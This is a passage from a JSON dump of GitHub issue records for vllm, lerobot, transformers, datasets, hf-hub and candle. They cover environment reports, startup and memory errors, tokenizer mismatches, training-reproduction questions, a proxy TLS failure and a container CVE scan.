2\nNUMA node(s): 2\nVendor ID: GenuineIntel\nCPU family: 6\nModel: 143\nModel name: Intel(R) Xeon(R) Platinum 8480+\nStepping: 8\nFrequency boost: enabled\nCPU MHz: 900.000\nCPU max MHz: 2001.0000\nCPU min MHz: 800.0000\nBogoMIPS: 4000.00\nVirtualization: VT-x\nL1d cache: 5.3 MiB\nL1i cache: 3.5 MiB\nL2 cache: 224 MiB\nL3 cache: 210 MiB\nNUMA node0 CPU(s): 0-55,112-167\nNUMA node1 CPU(s): 56-111,168-223\nVulnerability Gather data sampling: Not affected\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl and seccomp\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Enhanced / Automatic IBRS; IBPB conditional; RSB filling; PBRSB-eIBRS SW sequence; BHI BHI_DIS_S\nVulnerability Srbds: Not affected\nVulnerability Tsx async abort: Not affected\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf tsc_known_freq pni pclmulqdq dtes64 ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe 
popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb cat_l3 cat_l2 cdp_l3 invpcid_single cdp_l2 ssbd mba ibrs ibpb stibp ibrs_enhanced tpr_shadow vnmi flexpriority ept vpid ept_ad fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid cqm rdt_a avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb intel_pt avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local avx512_bf16 wbnoinvd dtherm ida arat pln pts avx512vbmi umip pku ospke waitpkg avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg tme avx512_vpopcntdq rdpid cldemote movdiri movdir64b md_clear pconfig flush_l1d arch_capabilities\n\n==============================\nVersions of relevant libraries\n==============================\n[pip3] numpy==2.2.0\n[pip3] nvidia-cublas-cu12==12.8.4.1\n[pip3] nvidia-cuda-cupti-cu12==12.8.90\n[pip3] nvidia-cuda-nvrtc-cu12==12.8.93\n[pip3] nvidia-cuda-runtime-cu12==12.8.90\n[pip3] nvidia-", "url": "https://github.com/vllm-project/vllm/issues/26614", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-11T03:35:38Z", "updated_at": "2025-10-11T03:36:31Z", "comments": 0, "user": "betacatZ" }, { "repo": "vllm-project/vllm", "number": 26612, "title": "[Usage]: qwen3vl 30 A3B \u542f\u52a8vllm \u670d\u52a1\u62a5\u9519", "body": "### \ud83d\udcda The doc issue\n\nA_A800-SXM4-80GB.json']\n(Worker pid=1939690) INFO 10-11 10:42:13 [monitor.py:34] torch.compile takes 85.33 s in total\n(Worker pid=1939690) INFO 10-11 10:42:14 [gpu_worker.py:298] Available KV cache memory: 13.69 GiB\n(EngineCore_DP0 pid=1937911) ERROR 10-11 10:42:14 [core.py:708] EngineCore failed to start.\n(EngineCore_DP0 pid=1937911) ERROR 10-11 10:42:14 [core.py:708] Traceback (most recent call last):\n(EngineCore_DP0 pid=1937911) ERROR 10-11 10:42:14 [core.py:708] File \"/home/ma-user/work/renkexuan/.venv/lib/python3.12/site-packages/vllm/v1/engine/core.py\", line 699, in run_engine_core\n(EngineCore_DP0 pid=1937911) ERROR 10-11 10:42:14 [core.py:708] engine_core = EngineCoreProc(*args, **kwargs)\n(EngineCore_DP0 pid=1937911) ERROR 10-11 10:42:14 [core.py:708] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n(EngineCore_DP0 pid=1937911) ERROR 10-11 10:42:14 [core.py:708] File \"/home/ma-user/work/renkexuan/.venv/lib/python3.12/site-packages/vllm/v1/engine/core.py\", line 498, in __init__\n(EngineCore_DP0 pid=1937911) ERROR 10-11 10:42:14 [core.py:708] super().__init__(vllm_config, executor_class, log_stats,\n(EngineCore_DP0 pid=1937911) ERROR 10-11 10:42:14 [core.py:708] File \"/home/ma-user/work/renkexuan/.venv/lib/python3.12/site-packages/vllm/v1/engine/core.py\", line 92, in __init__\n(EngineCore_DP0 pid=1937911) ERROR 10-11 10:42:14 [core.py:708] self._initialize_kv_caches(vllm_config)\n(EngineCore_DP0 pid=1937911) ERROR 10-11 10:42:14 [core.py:708] File \"/home/ma-user/work/renkexuan/.venv/lib/python3.12/site-packages/vllm/v1/engine/core.py\", line 199, in _initialize_kv_caches\n(EngineCore_DP0 pid=1937911) ERROR 10-11 10:42:14 [core.py:708] kv_cache_configs = get_kv_cache_configs(vllm_config, kv_cache_specs,\n(EngineCore_DP0 pid=1937911) ERROR 10-11 10:42:14 [core.py:708] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n(EngineCore_DP0 pid=1937911) ERROR 10-11 10:42:14 [core.py:708] File \"/home/ma-user/work/renkexuan/.venv/lib/python3.12/site-packages/vllm/v1/core/kv_cache_utils.py\", line 1243, in get_kv_cache_configs\n(EngineCore_DP0 pid=1937911) ERROR 10-11 10:42:14 [core.py:708] check_enough_kv_cache_memory(vllm_config, 
kv_cache_spec_one_worker,\n(EngineCore_DP0 pid=1937911) ERROR 10-11 10:42:14 [core.py:708] File \"/home/ma-user/work/renkexuan/.venv/lib/python3.12/site-packages/vllm/v1/core/kv_cache_utils.py\", line 716, in check_enough_kv_cache_memory\n(EngineCore_DP0 pid=1937911) ERROR 10-11 10:42:14 [core.py:708] raise ValueError(\n(EngineCore_DP0 pid=1937911) ERROR 10-11 10:42:14 [core.py:708] ValueError: To serve at least one request with the models's max seq len (262144), (24.00 GiB KV cache is needed, which is larger than the available KV cache memory (13.69 GiB). Based on the available memory, the estimated maximum model length is 149520. Try increasing `gpu_memory_utilization` or decreasing `max_model_len` when initializing the engine.\n(EngineCore_DP0 pid=1937911) ERROR 10-11 10:42:17 [multiproc_executor.py:154] Worker proc VllmWorker-0 died unexpectedly, shutting down executor.\n(EngineCore_DP0 pid=1937911) Process EngineCore_DP0:\n(EngineCore_DP0 pid=1937911) Traceback (most recent call last):\n(EngineCore_DP0 pid=1937911) File \"/home/ma-user/work/anaconda3_flash_attn/envs/qwen3_vl/lib/python3.12/multiprocessing/process.py\", line 314, in _bootstrap\n(EngineCore_DP0 pid=1937911) self.run()\n(EngineCore_DP0 pid=1937911) File \"/home/ma-user/work/anaconda3_flash_attn/envs/qwen3_vl/lib/python3.12/multiprocessing/process.py\", line 108, in run\n(EngineCore_DP0 pid=1937911) self._target(*self._args, **self._kwargs)\n(EngineCore_DP0 pid=1937911) File \"/home/ma-user/work/renkexuan/.venv/lib/python3.12/site-packages/vllm/v1/engine/core.py\", line 712, in run_engine_core\n(EngineCore_DP0 pid=1937911) raise e\n(EngineCore_DP0 pid=1937911) File \"/home/ma-user/work/renkexuan/.venv/lib/python3.12/site-packages/vllm/v1/engine/core.py\", line 699, in run_engine_core\n(EngineCore_DP0 pid=1937911) engine_core = EngineCoreProc(*args, **kwargs)\n(EngineCore_DP0 pid=1937911) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n(EngineCore_DP0 pid=1937911) File \"/home/ma-user/work/renkexuan/.venv/lib/python3.12/site-packages/vllm/v1/engine/core.py\", line 498, in __init__\n(EngineCore_DP0 pid=1937911) super().__init__(vllm_config, executor_class, log_stats,\n(EngineCore_DP0 pid=1937911) File \"/home/ma-user/work/renkexuan/.venv/lib/python3.12/site-packages/vllm/v1/engine/core.py\", line 92, in __init__\n(EngineCore_DP0 pid=1937911) self._initialize_kv_caches(vllm_config)\n(EngineCore_DP0 pid=1937911) File \"/home/ma-user/work/renkexuan/.venv/lib/python3.12/site-packages/vllm/v1/engine/core.py\", line 199, in _initialize_kv_caches\n(EngineCore_DP0 pid=1937911) kv_cache_configs = get_kv_cache_configs(vllm_config, kv_cache_specs,\n(EngineCore_DP0 pid=1937911) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n(Engin", "url": "https://github.com/vllm-project/vllm/issues/26612", "state": "closed", "labels": [ "usage" ], "created_at": "2025-10-11T02:45:20Z", "updated_at": "2025-10-16T23:00:39Z", "comments": 1, "user": "renkexuan369" }, { "repo": "huggingface/lerobot", "number": 2171, "title": "Data diffusion and data format conversion", "body": "1. Can datasets collected in Lerobot format be disseminated?\n2. Can data formats between different Lerobot versions be converted? 
I noticed that the data format collected in version 0.2.0 is different from the latest data format.\nThank you!", "url": "https://github.com/huggingface/lerobot/issues/2171", "state": "open", "labels": [ "question", "dataset" ], "created_at": "2025-10-11T02:16:55Z", "updated_at": "2025-10-17T02:02:36Z", "user": "FALCONYU" }, { "repo": "vllm-project/vllm", "number": 26607, "title": "[Bug]: Since version 0.9.2 comes with nccl built-in, using PCIE causes sys errors. How to disable nccl in vllm for versions after 0.9.2?", "body": "### Your current environment\n\n
\n\n\"Image\"\n\n\n### \ud83d\udc1b Describe the bug\n\n sh 06_startVllmAPI.sh \nINFO 09-30 10:30:16 [__init__.py:216] Automatically detected platform cuda.\n(APIServer pid=1599676) INFO 09-30 10:30:17 [api_server.py:1896] vLLM API server version 0.10.2\n(APIServer pid=1599676) INFO 09-30 10:30:17 [utils.py:328] non-default args: {'port': 6006, 'model': './autodl-tmp/modelscope/models/GeoGPT/Qwen2.5-72B-GeoGPT', 'tokenizer': './autodl-tmp/modelscope/models/GeoGPT/Qwen2.5-72B-GeoGPT', 'trust_remote_code': True, 'dtype': 'bfloat16', 'served_model_name': ['Qwen2.5-72B-GeoGPT'], 'tensor_parallel_size': 8, 'gpu_memory_utilization': 0.5}\n(APIServer pid=1599676) The argument `trust_remote_code` is to be used with Auto classes. It has no effect here and is ignored.\n(APIServer pid=1599676) INFO 09-30 10:30:24 [__init__.py:742] Resolved architecture: Qwen2ForCausalLM\n(APIServer pid=1599676) `torch_dtype` is deprecated! Use `dtype` instead!\n(APIServer pid=1599676) INFO 09-30 10:30:24 [__init__.py:1815] Using max model len 131072\n(APIServer pid=1599676) INFO 09-30 10:30:24 [scheduler.py:222] Chunked prefill is enabled with max_num_batched_tokens=2048.\nINFO 09-30 10:30:29 [__init__.py:216] Automatically detected platform cuda.\n(EngineCore_DP0 pid=1600151) INFO 09-30 10:30:31 [core.py:654] Waiting for init message from front-end.\n(EngineCore_DP0 pid=1600151) INFO 09-30 10:30:31 [core.py:76] Initializing a V1 LLM engine (v0.10.2) with config: model='./autodl-tmp/modelscope/models/GeoGPT/Qwen2.5-72B-GeoGPT', speculative_config=None, tokenizer='./autodl-tmp/modelscope/models/GeoGPT/Qwen2.5-72B-GeoGPT', skip_tokenizer_init=False, tokenizer_mode=auto, revision=None, tokenizer_revision=None, trust_remote_code=True, dtype=torch.bfloat16, max_seq_len=131072, download_dir=None, load_format=auto, tensor_parallel_size=8, pipeline_parallel_size=1, data_parallel_size=1, disable_custom_all_reduce=False, quantization=None, enforce_eager=False, kv_cache_dtype=auto, device_config=cuda, decoding_config=DecodingConfig(backend='auto', disable_fallback=False, disable_any_whitespace=False, disable_additional_properties=False, reasoning_backend=''), observability_config=ObservabilityConfig(show_hidden_metrics_for_version=None, otlp_traces_endpoint=None, collect_detailed_traces=None), seed=0, served_model_name=Qwen2.5-72B-GeoGPT, enable_prefix_caching=True, chunked_prefill_enabled=True, use_async_output_proc=True, pooler_config=None, compilation_config={\"level\":3,\"debug_dump_path\":\"\",\"cache_dir\":\"\",\"backend\":\"\",\"custom_ops\":[],\"splitting_ops\":[\"vllm.unified_attention\",\"vllm.unified_attention_with_output\",\"vllm.mamba_mixer2\",\"vllm.mamba_mixer\",\"vllm.short_conv\",\"vllm.linear_attention\",\"vllm.plamo2_mamba_mixer\",\"vllm.gdn_attention\"],\"use_inductor\":true,\"compile_sizes\":[],\"inductor_compile_config\":{\"enable_auto_functionalized_v2\":false},\"inductor_passes\":{},\"cudagraph_mode\":1,\"use_cudagraph\":true,\"cudagraph_num_of_warmups\":1,\"cudagraph_capture_sizes\":[512,504,496,488,480,472,464,456,448,440,432,424,416,408,400,392,384,376,368,360,352,344,336,328,320,312,304,296,288,280,272,264,256,248,240,232,224,216,208,200,192,184,176,168,160,152,144,136,128,120,112,104,96,88,80,72,64,56,48,40,32,24,16,8,4,2,1],\"cudagraph_copy_inputs\":false,\"full_cuda_graph\":false,\"pass_config\":{},\"max_capture_size\":512,\"local_cache_dir\":null}\n(EngineCore_DP0 pid=1600151) WARNING 09-30 10:30:31 [multiproc_worker_utils.py:273] Reducing Torch parallelism from 64 threads to 1 to avoid 
unnecessary CPU contention. Set OMP_NUM_THREADS in the external environment to tune this value as needed.\n(EngineCore_DP0 pid=1600151) INFO 09-30 10:30:31 [shm_broadcast.py:289] vLLM message queue communication handle: Handle(local_reader_ranks=[0, 1, 2, 3, 4, 5, 6, 7], buffer_handle=(8, 16777216, 10, 'psm_7e0498ff'), local_subscribe_addr='ipc:///tmp/33a7ec3b-72b3-4984-9ed3-6fc1fb572c4a', remote_subscribe_addr=None, remote_addr_ipv6=False)\nINFO 09-30 10:30:35 [__init__.py:216] Automatically detected platform cuda.\nINFO 09-30 10:30:35 [__init__.py:216] Automatically detected platform cuda.\nINFO 09-30 10:30:35 [__init__.py:216] Automatically detected platform cuda.\nINFO 09-30 10:30:35 [__init__.py:216] Automatically detected platform cuda.\nINFO 09-30 10:30:35 [__init__.py:216] Automatically detected platform cuda.\nINFO 09-30 10:30:35 [__init__.py:216] Automatically detected platform cuda.\nINFO 09-30 10:30:35 [__init__.py:216] Automatically detected platform cuda.\nINFO 09-30 10:30:35 [__init__.py:216] Automatically detected platform cuda.\nINFO 09-30 10:30:40 [shm_broadcast.py:289] vLLM message queue communication handle: Handle(local_reader_ranks=[0], buffer_handle=(1, 10485760, 10, 'psm_1413bf45'), local_subscribe_addr='ipc:///tmp/a", "url": "https://github.com/vllm-project/vllm/issues/26607", "state": "open", "labels": [ "bug" ], "created_at": "2025-10-11T01:48:50Z", "updated_at": "2025-10-17T01:09:03Z", "comments": 0, "user": "tina0852" }, { "repo": "huggingface/hf-hub", "number": 131, "title": "InvalidCertificate and how to fix it", "body": "I am trying to install a DuckDB extension written in Rust (https://github.com/martin-conur/quackformers) that uses the library.\n\nDuring the install, I am getting a\n```\nHfHub(RequestError(Transport(Transport { kind: ConnectionFailed, message: Some(\"tls connection init failed\"), url: Some(Url { scheme: \"https\", cannot_be_a_base: false, username: \"\", password: None, host: Some(Domain(\"huggingface.co\")), port: None, path: \"/sentence-transformers/all-MiniLM-L6-v2/resolve/main/tokenizer.json\", query: None, fragment: None }), source: Some(Custom { kind: InvalidData, error: InvalidCertificate(UnknownIssuer) }) })))\n```\nThe file can be accessed from my environment via curl.\nThe file can be accessed from DuckDB using their `httpfs` extension which is written in C/C++.\n\nI am working in environment with a very strict enterprise proxy and this is most likely what's causing the issue (I have zero issue when running the same commands at home).\n\n1. can the behavior of HfHub with respect to proxy be modified using env variables?\n2. can the behavior of HfHub with respect to TLS certificates be modified using env variables? \n3. where can I find the default value(s) for the proxy settings and the location of certs used by the library\n\nReferences:\n- bug report for quackformer = https://github.com/martin-conur/quackformers/issues/7\n", "url": "https://github.com/huggingface/hf-hub/issues/131", "state": "open", "labels": [], "created_at": "2025-10-10T14:42:12Z", "updated_at": "2025-10-10T18:18:28Z", "user": "sahuguet" }, { "repo": "vllm-project/vllm", "number": 26585, "title": "[Usage]: use vllm embedding to extract last token hidden states?", "body": "### Your current environment\n\n```/usr/local/lib/python3.12/dist-packages/torch/cuda/__init__.py:63: FutureWarning: The pynvml package is deprecated. Please install nvidia-ml-py instead. 
If you did not install pynvml directly, please report this to the maintainers of the package that installed pynvml for you.\n import pynvml # type: ignore[import]\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 22.04.5 LTS (x86_64)\nGCC version : (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0\nClang version : 14.0.0-1ubuntu1.1\nCMake version : version 3.21.0\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.8.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.11 (main, Jun 4 2025, 08:56:18) [GCC 11.4.0] (64-bit runtime)\nPython platform : Linux-5.10.134-16.3.al8.x86_64-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : Could not collect\nCUDA_MODULE_LOADING set to : LAZY\nGPU models and configuration : GPU 0: NVIDIA H20-3e\nNvidia driver version : 570.133.20\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 52 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 192\nOn-line CPU(s) list: 0-191\nVendor ID: GenuineIntel\nModel name: INTEL(R) XEON(R) PLATINUM 8575C\nCPU family: 6\nModel: 207\nThread(s) per core: 2\nCore(s) per socket: 48\nSocket(s): 2\nStepping: 2\nCPU max MHz: 4000.0000\nCPU min MHz: 800.0000\nBogoMIPS: 5600.00\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf tsc_known_freq pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb cat_l3 cat_l2 cdp_l3 invpcid_single cdp_l2 ssbd mba ibrs ibpb stibp ibrs_enhanced tpr_shadow vnmi flexpriority ept vpid ept_ad fsgsbase tsc_adjust bmi1 hle avx2 smep bmi2 erms invpcid rtm cqm rdt_a avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb intel_pt avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local split_lock_detect avx_vnni avx512_bf16 wbnoinvd dtherm ida arat pln pts hwp hwp_notify hwp_act_window hwp_epp hwp_pkg_req hfi avx512vbmi umip pku ospke waitpkg avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg tme avx512_vpopcntdq rdpid bus_lock_detect cldemote movdiri movdir64b enqcmd fsrm uintr md_clear serialize tsxldtrk pconfig arch_lbr amx_bf16 avx512_fp16 amx_tile amx_int8 flush_l1d arch_capabilities\nVirtualization: VT-x\nL1d cache: 4.5 MiB (96 instances)\nL1i cache: 3 MiB (96 instances)\nL2 cache: 192 MiB (96 instances)\nL3 cache: 640 MiB (2 instances)\nNUMA node(s): 2\nNUMA node0 CPU(s): 0-47,96-143\nNUMA node1 CPU(s): 48-95,144-191\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Retbleed: Not 
affected\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl and seccomp\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Enhanced IBRS, IBPB conditional, RSB filling, PBRSB-eIBRS SW sequence\nVulnerability Srbds: Not affected\nVulnerability Tsx async abort: Not affected\n\n==============================\nVersions of relevant libraries\n==============================\n[pip3] flashinfer-pytho", "url": "https://github.com/vllm-project/vllm/issues/26585", "state": "closed", "labels": [ "usage" ], "created_at": "2025-10-10T13:01:42Z", "updated_at": "2025-12-15T06:54:05Z", "comments": 2, "user": "rxqy" }, { "repo": "vllm-project/vllm", "number": 26582, "title": "[Bug]: which triton-kernels version for MXFP4 Triton backend?", "body": "### Your current environment\n\nvllm v0.11.0 installed via `uv pip install vllm --torch-backend=auto`\n\ntriton + triton-kernels at different commits installed from source\n\n### \ud83d\udc1b Describe the bug\n\n**Which triton + triton-kernels version does one have to install to run GPT-OSS with the MXFP4 Triton backend?**\n\nNo matter which version I try, I always get an error `Failed to import Triton kernels. Please make sure your triton version is compatible.`\n\nClearly, the latest triton-kernels will not work since the code in `vllm.model_executor.layers.fused_moe.gpt_oss_triton_kernels_moe` tries to import from `triton_kernels.routing`, but `triton_kernels.routing` has been deprecated (cf. https://github.com/triton-lang/triton/commit/30ede52aa2aecfd2ab3d6672ed21bbf4eb6438b3).\n\nBut also with older versions I get errors like `ImportError: cannot import name 'triton_key' from 'triton.compiler.compiler` or `Error: No module named 'triton.language.target_info`.\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/26582", "state": "closed", "labels": [ "bug" ], "created_at": "2025-10-10T11:51:59Z", "updated_at": "2025-12-12T20:30:06Z", "comments": 8, "user": "matkle" }, { "repo": "huggingface/lerobot", "number": 2162, "title": "[Question] How to suppress verbose Svt[info] logs from video encoding during save_episode()?", "body": "Hi, thank you for this fantastic library!\n\nI am currently using lerobot (Version: 0.3.3) to record and save robotics data. When I use the `dataset.save_episode() method`, I get a large number of verbose log messages prefixed with Svt[info]:\n\n```shell\nSvt[info]: ------------------------------------------- | 0/1 [00:00What is eunoia?\")\nprint(f\"{x1=}\")\n\nt2 = AutoTokenizer.from_pretrained(\"google/gemma-3-4b-it\")\nx2 = t2.tokenize(\"What is eunoia?\")\nprint(f\"{x2=}\")\n``` \n\n### Expected behavior\n\nThe print out of the x1 and x2 should be the same. 
However,\n\n```\nx1=['', 'Wh', 'at', '\u2581is', '\u2581eu', 'no', 'ia', '?']\nx2=['', 'What', '\u2581is', '\u2581e', 'uno', 'ia', '?']\n```\nLooking more into it, the tokenizer created for HF model (t2) is BPE while the tokenizer created for the GGUF model (t1) is Unigram.", "url": "https://github.com/huggingface/transformers/issues/41494", "state": "closed", "labels": [ "bug" ], "created_at": "2025-10-09T23:27:25Z", "updated_at": "2025-11-29T08:02:57Z", "comments": 4, "user": "amychen85" }, { "repo": "vllm-project/vllm", "number": 26530, "title": "[Bug]: Fix CVE-2023-48022 in docker image", "body": "### Your current environment\n\n
\nNot required for this.\n\n
\n\n\n### \ud83d\udc1b Describe the bug\n\nThe vllm/vllm-openai:v0.10.2 image seems to be affected by the [CVE-2023-48022](https://avd.aquasec.com/nvd/2023/cve-2023-48022/) **Critical** CVE with `ray` (see scan results below). Is there any plan to address this?\n\n```\ngrype vllm/vllm-openai:v0.10.2 --scope all-layers\n```\n\n```\nNAME INSTALLED FIXED IN TYPE VULNERABILITY SEVERITY EPSS RISK\nray 2.49.1 python GHSA-6wgj-66m2-xxp2 Critical 91.9% (99th) 86.4\nlibgssapi-krb5-2 1.19.2-2ubuntu0.4 1.19.2-2ubuntu0.5 deb CVE-2024-3596 Medium 24.6% (95th) 12.3\nlibk5crypto3 1.19.2-2ubuntu0.4 1.19.2-2ubuntu0.5 deb CVE-2024-3596 Medium 24.6% (95th) 12.3\nlibkrb5-3 1.19.2-2ubuntu0.4 1.19.2-2ubuntu0.5 deb CVE-2024-3596 Medium 24.6% (95th) 12.3\nlibkrb5support0 1.19.2-2ubuntu0.4 1.19.2-2ubuntu0.5 deb CVE-2024-3596 Medium 24.6% (95th) 12.3\npython3-pip 22.0.2+dfsg-1ubuntu0.6 22.0.2+dfsg-1ubuntu0.7 deb CVE-2023-32681 Medium 6.3% (90th) 3.1\nlibaom3 3.3.0-1ubuntu0.1 deb CVE-2019-2126 Low 8.1% (91st) 2.4\nlibcaca0 0.99.beta19-2.2ubuntu4 deb CVE-2022-0856 Low 4.9% (89th) 1.5\npython3-httplib2 0.20.2-2 deb CVE-2021-21240 Low 4.5% (88th) 1.4\nlogin 1:4.8.1-2ubuntu2.2 deb CVE-2024-56433 Low 3.6% (87th) 1.1\npasswd 1:4.8.1-2ubuntu2.2 deb CVE-2024-56433 Low 3.6% (87th) 1.1\n...\n```\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/26530", "state": "closed", "labels": [ "bug" ], "created_at": "2025-10-09T20:16:02Z", "updated_at": "2025-10-10T21:14:49Z", "comments": 3, "user": "geodavic" }, { "repo": "huggingface/lerobot", "number": 2156, "title": "How to reproduce lerobot/pi0_libero_finetuned?", "body": "Thanks for the great work!\n\nI evaluated lerobot/pi0_libero_finetuned on libero goal datasets.\nWhen using n_action_steps=50, the success rate is ~ 75%\nWhen using n_action_steps=10, the success rate is ~ 90%\n\nI tried to reproduce the training results, so I mainly referred to [train_config.json](https://huggingface.co/lerobot/pi0_libero_finetuned/blob/main/train_config.json) in the `lerobot/pi0_libero_finetuned` repo, which has one key value pair in the config dict:\n```\n\"pretrained_path\": \"pepijn223/pi0_libero_finetuned_extra\"\n```\n\nSo I also referred to the [train_config.json](https://huggingface.co/pepijn223/pi0_libero_finetuned_extra/blob/main/train_config.json) in the `pepijn223/pi0_libero_finetuned_extra` repo, which also has the key value pair:\n```\n\"pretrained_path\": \"lerobot/pi0_libero_finetuned\"\n```\nThis again points back to the checkpoint that depends on it.\n\nAnd my questions are: how are these checkpoints actually trained, and can anyone provide a train_config.json in the latest lerobot version that can reproduce lerobot/pi0_libero_finetuned?\n\nPlease also share some successful training configs if possible!", "url": "https://github.com/huggingface/lerobot/issues/2156", "state": "open", "labels": [ "question", "policies", "simulation" ], "created_at": "2025-10-09T18:11:47Z", "updated_at": "2025-10-22T09:27:03Z", "user": "PuzhenYuan" }, { "repo": "huggingface/lerobot", "number": 2153, "title": "Why can\u2019t I find something like train_expert_only in the latest version of pi0? 
Do the current versions of pi0 and pi0.5 only support full-parameter training?", "body": "Why can\u2019t I find something like \u201ctrain_expert_only\u201d in the latest version of pi0?\nDo the current versions of pi0 and pi0.5 only support full-parameter training?", "url": "https://github.com/huggingface/lerobot/issues/2153", "state": "closed", "labels": [ "enhancement", "question", "policies", "good first issue" ], "created_at": "2025-10-09T13:08:10Z", "updated_at": "2025-12-31T14:54:29Z", "user": "ZHHhang" }, { "repo": "huggingface/datasets", "number": 7802, "title": "[Docs] Missing documentation for `Dataset.from_dict`", "body": "Documentation link: https://huggingface.co/docs/datasets/en/package_reference/main_classes\n\nLink to method (docstring present): https://github.com/huggingface/datasets/blob/6f2502c5a026caa89839713f6f7c8b958e5e83eb/src/datasets/arrow_dataset.py#L1029\n\nThe docstring is present for the function, but seems missing from the official documentation for the `Dataset` class on HuggingFace.\n\nThe method in question:\n```python\n @classmethod\n def from_dict(\n cls,\n mapping: dict,\n features: Optional[Features] = None,\n info: Optional[DatasetInfo] = None,\n split: Optional[NamedSplit] = None,\n ) -> \"Dataset\":\n \"\"\"\n Convert `dict` to a `pyarrow.Table` to create a [`Dataset`].\n\n Important: a dataset created with from_dict() lives in memory\n and therefore doesn't have an associated cache directory.\n This may change in the future, but in the meantime if you\n want to reduce memory usage you should write it back on disk\n and reload using e.g. save_to_disk / load_from_disk.\n\n Args:\n mapping (`Mapping`):\n Mapping of strings to Arrays or Python lists.\n features ([`Features`], *optional*):\n Dataset features.\n info (`DatasetInfo`, *optional*):\n Dataset information, like description, citation, etc.\n split (`NamedSplit`, *optional*):\n Name of the dataset split.\n\n Returns:\n [`Dataset`]\n \"\"\"\n```", "url": "https://github.com/huggingface/datasets/issues/7802", "state": "open", "labels": [], "created_at": "2025-10-09T02:54:41Z", "updated_at": "2025-10-19T16:09:33Z", "comments": 2, "user": "aaronshenhao" }, { "repo": "huggingface/transformers", "number": 41431, "title": "gradient scaling occurs even though total gradient remains < max_grad_norm in trainer.py", "body": "Even though gradients remain < max_grad_norm throughout training, the gradient still goes through a scaling process. For instance, I set max_grad_norm = 1, and grad_norm consistently remains <= 0.33. Because the trainer runs the gradient-clipping step whenever max_grad_norm is > 0 and not None, this operation always gets executed within torch's clip function: `clip_coef = max_norm / (total_norm + 1e-6)`. Is there a way to prevent this? Thanks. \n\n", "url": "https://github.com/huggingface/transformers/issues/41431", "state": "closed", "labels": [], "created_at": "2025-10-07T22:13:08Z", "updated_at": "2025-11-15T08:02:51Z", "comments": 7, "user": "lorsonblair" }, { "repo": "huggingface/candle", "number": 3120, "title": "AutoModel / PreTrainedModel equivalent magic ?", "body": "Hello all, first, thanks a lot for this wonderful crate. \n\nI was wondering if it's on the roadmap, or if there is a solution to have the same magic as in Python with an `AutoModel.from_pretrained(\"the_model_name_string\")` call.\n\nAs I'm prototyping and am often changing models... which requires changing the architecture every time, having this \"auto load\" would save time. 
